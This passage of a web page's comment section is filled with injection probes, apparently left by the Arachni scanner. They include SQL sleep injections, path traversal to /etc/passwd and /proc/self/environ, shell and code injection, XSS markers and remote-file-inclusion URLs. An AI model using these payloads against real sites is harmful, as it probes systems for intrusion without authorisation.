class="comment">1'));select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name'));select pg_sleep(4); -- </p> <p class="comment">1</p> <p> - by arachni_name"=sleep(4)=" </p> <p class="comment">1</p> <p> - by arachni_name';select pg_sleep(4); -- </p> <p class="comment">1</p> <p> - by arachni_name);waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name));waitfor delay '0:0:4'-- </p> <p class="comment">1';.")</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name");waitfor delay '0:0:4'-- </p> <p class="comment">1"));waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name);select pg_sleep(4); -- </p> <p class="comment">1';waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1' and sleep(4) # </p> <p> - by arachni_name </p> <p class="comment">1");waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1";waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1'));waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name"));waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name'));waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name";waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name');waitfor delay '0:0:4'-- </p> <p class="comment">1));select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1));waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name' or sleep(4) # </p> <p class="comment">1</p> <p> - by arachni_name" and sleep(4)=" </p> <p class="comment">1' or sleep(4) # </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name or sleep(4) # </p> <p class="comment">1</p> <p> - by arachni_name' and sleep(4) # </p> <p class="comment">1</p> <p> - by arachni_name' and sleep(4)=' </p> <p class="comment">1' and sleep(4)='</p> <p> - by arachni_name </p> <p class="comment">1 or sleep(4) # </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name" or sleep(4) # </p> <p class="comment">1" and sleep(4)="</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name and sleep(4) </p> <p class="comment">1</p> <p> - by arachni_name;select pg_sleep(4); -- </p> <p class="comment">1');select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1' where sleep(4) # </p> <p> - by arachni_name </p> <p class="comment">1);select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1 and sleep(4)</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../..//etc/passwd </p> <p class="comment">file:///../../../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../../..//etc/passwd </p> <p class="comment">/../../../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../..//etc/passwd . </p> <p class="comment">1</p> <p> - by file:///../../../../../../../../..//etc/passwd . </p> <p class="comment">1</p> <p> - by file:///../../../../../../..//etc/passwd . </p> <p class="comment">/../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">/../../../../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by /../../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by /../../../../../../..//etc/passwd . </p> <p class="comment">/../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../..//etc/passwd . </p> <p class="comment">/../../../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">file:///../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">/../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">/../../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../..//etc/passwd . </p> <p class="comment">1</p> <p> - by file:///../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///../../../../../..//etc/passwd . </p> <p class="comment">file:///../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by /../../../..//etc/passwd . </p> <p class="comment">/../../../../../../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../../..//etc/passwd </p> <p class="comment">/../../../../../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../..//etc/passwd </p> <p class="comment">file:///../../../../../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by /../../../../../../../../..//etc/passwd . </p> <p class="comment">1</p> <p> - by /../../../../..//etc/passwd . </p> <p class="comment">1</p> <p> - by file:///../../../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by /../../../../../../../..//etc/passwd . </p> <p class="comment">1</p> <p> - by /../../../../../..//etc/passwd . </p> <p class="comment">/../../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///../../..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///../../..//etc/passwd . </p> <p class="comment">file:///../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../..//etc/passwd </p> <p class="comment">/../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../..//etc/passwd . </p> <p class="comment">/../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../../../..//proc/self/environ . </p> <p class="comment">1</p> <p> - by /../..//etc/passwd . </p> <p class="comment">1</p> <p> - by file:///../..//etc/passwd </p> <p class="comment">/../../../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">file:///../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">/../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">/../../../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">/../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../..//etc/passwd </p> <p class="comment">file:///../..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">file:///../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../../..//proc/self/environ . </p> <p class="comment">1</p> <p> - by file:///..//etc/passwd . </p> <p class="comment">/..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /..//etc/passwd . </p> <p class="comment">file:///..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../..//proc/self/environ . </p> <p class="comment">file:///../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../..//proc/self/environ . </p> <p class="comment">1</p> <p> - by /../../../../../..//proc/self/environ . </p> <p class="comment">1</p> <p> - by /../../../../../..//proc/self/environ </p> <p class="comment">1</p> <p> - by file:///../../../../..//proc/self/environ </p> <p class="comment">/../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../..//proc/self/environ </p> <p class="comment">file:///../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../..//proc/self/environ . </p> <p class="comment">file:///../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../..//proc/self/environ </p> <p class="comment">/../../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../..//proc/self/environ . </p> <p class="comment">1</p> <p> - by file:///../../..//proc/self/environ </p> <p class="comment">1</p> <p> - by file:///../../../..//proc/self/environ </p> <p class="comment">file:///../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../..//proc/self/environ . </p> <p class="comment">/../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../..//proc/self/environ </p> <p class="comment">1</p> <p> - by /../..//proc/self/environ . </p> <p class="comment">1</p> <p> - by file:///../../../..//proc/self/environ . </p> <p class="comment">file:///../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/../../../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../..//proc/self/environ . </p> <p class="comment">file:///../../../../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../..//proc/self/environ </p> <p class="comment">1</p> <p> - by file:///../../../../../..//proc/self/environ </p> <p class="comment">/../../../../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/../../../../../../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../../..//proc/self/environ </p> <p class="comment">file:///..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">/../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///../..//etc/passwd . </p> <p class="comment">1</p> <p> - by /../../../../../../../../..//proc/self/environ </p> <p class="comment">1</p> <p> - by /../../../../../../..//proc/self/environ </p> <p class="comment">/../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../..//proc/self/environ . </p> <p class="comment">/../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../..//proc/self/environ . </p> <p class="comment">file:///../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/../../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../../..//proc/self/environ . </p> <p class="comment">/../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../..//proc/self/environ . </p> <p class="comment">/../../../../../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../..//proc/self/environ </p> <p class="comment">1</p> <p> - by /../../../../../../../..//proc/self/environ </p> <p class="comment">/..//etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../..//proc/self/environ . </p> <p class="comment">/../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../..//proc/self/environ </p> <p class="comment">1</p> <p> - by file:///..//proc/self/environ . </p> <p class="comment">/../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">" ; sleep 4 ; "</p> <p> - by arachni_name </p> <p class="comment">` sleep 4`</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by " ; sleep 4 ; " </p> <p class="comment">1</p> <p> - by file:///..//proc/self/environ </p> <p class="comment">file:///..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">file:///../..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">/..//proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">/../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../..//proc/self/environ </p> <p class="comment">file:///../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /..//proc/self/environ </p> <p class="comment">1</p> <p> - by /..//proc/self/environ . </p> <p class="comment">file:///..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ;import time;time.sleep(4000/1000); </p> <p class="comment">";sleep(4000/1000);#</p> <p> - by arachni_name </p> <p class="comment">file:///proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">;sleep(4000/1000);</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";sleep(4000/1000);# </p> <p class="comment">1</p> <p> - by php://input </p> <p class="comment">1</p> <p> - by ';sleep(4000/1000);# </p> <p class="comment"> import time;time.sleep(4000/1000);</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by import time;time.sleep(4000/1000); </p> <p class="comment">;import time;time.sleep(4000/1000);</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///proc/self/environ . </p> <p class="comment">";import time;time.sleep(4000/1000);#</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by php://input . </p> <p class="comment">1</p> <p> - by ';import time;time.sleep(4000/1000);# </p> <p class="comment">php://input .</p> <p> - by arachni_name </p> <p class="comment"> sleep(4000/1000);</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///etc/passwd . </p> <p class="comment">/proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">file:///etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///etc/passwd </p> <p class="comment">1</p> <p> - by /etc/passwd </p> <p class="comment">file:///etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /proc/self/environ </p> <p class="comment">file:///proc/self/environ .</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /etc/passwd . </p> <p class="comment">1</p> <p> - by /proc/self/environ . </p> <p class="comment">/proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/etc/passwd .</p> <p> - by arachni_name </p> <p class="comment">php://input</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ;sleep(4000/1000); </p> <p class="comment">';sleep(4000/1000);#</p> <p> - by arachni_name </p> <p class="comment">/etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ` sleep 4` </p> <p class="comment">' | sleep 4 | '</p> <p> - by arachni_name </p> <p class="comment"> ; sleep 4 ; </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by & sleep 4 & </p> <p class="comment">' & sleep 4 & '</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ; sleep 4 ; </p> <p class="comment">' ; sleep 4 ; '</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";import time;time.sleep(4000/1000);# </p> <p class="comment">1</p> <p> - by " && sleep 4 && " </p> <p class="comment">1</p> <p> - by " & sleep 4 & " </p> <p class="comment">" & sleep 4 & "</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ' ; sleep 4 ; ' </p> <p class="comment">" && sleep 4 && "</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by " | sleep 4 | " </p> <p class="comment">" | sleep 4 | "</p> <p> - by arachni_name </p> <p class="comment">';import time;time.sleep(4000/1000);#</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ' & sleep 4 & ' </p> <p class="comment">1</p> <p> - by sleep(4000/1000); </p> <p class="comment">1</p> <p> - by arachni_name) </p> <p class="comment">1)</p> <p> - by arachni_name </p> <p class="comment">sleep 4</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by | sleep 4 | </p> <p class="comment">1</p> <p> - by sleep 4 </p> <p class="comment"> & sleep 4 & </p> <p> - by arachni_name </p> <p class="comment">1"'`--</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by && sleep 4 && </p> <p class="comment">1</p> <p> - by arachni_name"'`-- </p> <p class="comment">1</p> <p> - by ' | sleep 4 | ' </p> <p class="comment">1</p> <p> - by ' && sleep 4 && ' </p> <p class="comment">' && sleep 4 && '</p> <p> - by arachni_name </p> <p class="comment"> && sleep 4 && </p> <p> - by arachni_name </p> <p class="comment"> | sleep 4 | </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name script:;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">1</p> <p> - by arachni_name ";arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">1</p> <p> - by arachni_name script:';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">1 script:';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">1()"&%1'-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>'</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name script:";arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">1%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name</textarea>--><xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/><!--<textarea> </p> <p class="comment">1</p> <p> - by arachni_name ';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">1 script:;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/> </p> <p class="comment">1 ;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3 </p> <p class="comment">1</p> <p> - by arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E </p> <p class="comment">1</p> <p> - by arachni_name()"&%1'-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>' </p> <p class="comment">1</p> <p> - by arachni_name%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27 </p> <p class="comment">1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E</p> <p> - by arachni_name </p> <p class="comment">1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/></p> <p> - by arachni_name </p> <p class="comment">1</textarea>--><xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/><!--<textarea></p> <p> - by arachni_name </p> <p class="comment">1%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3E</p> <p> - by arachni_name </p> <p class="comment">1 script:";arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">1 ";arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name ;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p> <p class="comment">https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/? </p> <p class="comment">www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/?</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//? </p> <p class="comment">1</p> <p> - by https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/ </p> <p class="comment">http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//?</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/ </p> <p class="comment">http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///proc/self/environ </p> <p class="comment">1</p> <p> - by https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//? </p> <p class="comment">1" arachni_xss_in_tag="ca890a60d2e09a1de6dc78b0f4d0f8ec" blah="</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com </p> <p class="comment">1' arachni_xss_in_tag='ca890a60d2e09a1de6dc78b0f4d0f8ec' blah='</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name" arachni_xss_in_tag="ca890a60d2e09a1de6dc78b0f4d0f8ec" blah=" </p> <p class="comment">www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name arachni_xss_in_tag=ca890a60d2e09a1de6dc78b0f4d0f8ec blah= </p> <p class="comment">1</p> <p> - by arachni_name' arachni_xss_in_tag='ca890a60d2e09a1de6dc78b0f4d0f8ec' blah=' </p> <p class="comment">https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//?</p> <p> - by arachni_name </p> <p class="comment">1 arachni_xss_in_tag=ca890a60d2e09a1de6dc78b0f4d0f8ec blah=</p> <p> - by arachni_name </p> <p class="comment">1 ';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p> <p> - by arachni_name </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by */; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p> <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p> <p class="comment">1</p> <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p> <p class="comment"></script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:"</p> <p> - by arachni_name </p> <p class="comment">1'"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name]]]]]]]]] </p> <p class="comment">1]]]]]]]]]</p> <p> - by arachni_name </p> <p class="comment">1<!--</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name#^($!@$)(()))****** </p> <p class="comment">1</p> <p> - by arachni_name'" </p> <p class="comment">1</p> <p> - by arachni_name<!-- </p> <p class="comment">1#^($!@$)(()))******</p> <p> - by arachni_name </p> <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1</p> <p> - by 